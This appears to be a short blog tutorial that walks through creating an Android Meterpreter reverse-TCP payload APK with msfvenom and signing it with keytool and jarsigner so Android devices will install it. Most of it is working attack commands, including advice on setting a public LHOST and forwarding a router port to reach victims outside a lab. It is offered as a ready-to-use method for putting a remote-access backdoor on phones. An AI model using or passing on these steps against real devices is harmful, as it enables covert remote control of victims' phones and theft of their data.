Using MSFvenom we create a payload .apk file for this we use following command:
msfvenom –p android/meterpreter/reverse_tcp LHOST=10.0.2.5 LPORT=4444 R > /root/Desktop/pentest.apk
MSFvenom payload
-p = Payload to be used
LHOST = Localhost IP to receive a back connection (Check yours with ifconfig command).
LPORT= Localhost Port on which the connection listen for the victim (We set it to 444).
R = Raw format (We select apk).
Location = to save the file.
Note: In this command, we have used the local address because we are in the local environment. To this in the public network, you have to enter your public address in LHOST and enable the port forwarding on the Router.
After this command, now you can locate your file on the Desktop with the name pentest.apk.
Pentest File Located
After Successfully created .apk file, we need to sign certificate because Android mobile devices are not allowing installing apps without the appropriately signed certificate. Android devices only install the signed .apk files.
We need to sign the apk file manually in Kali Linux using:
Keytool (Preinstalled)
jar signer (Preinstalled)
zipalign (Need to Install)
To sign the apk file locally use these commands: -
keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
Keytool making Keystore:-
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore APPNAME.apk aliasname
Signing an apk file with JARsigner
jarsigner -verify -verbose -certs APPNAME.apk
Verifying the Apk using jar signer
Zipalign is not preinstalled in Kali Linux, so you have to install it first.
Enjoy! Follow us for more...
No comments:
Post a Comment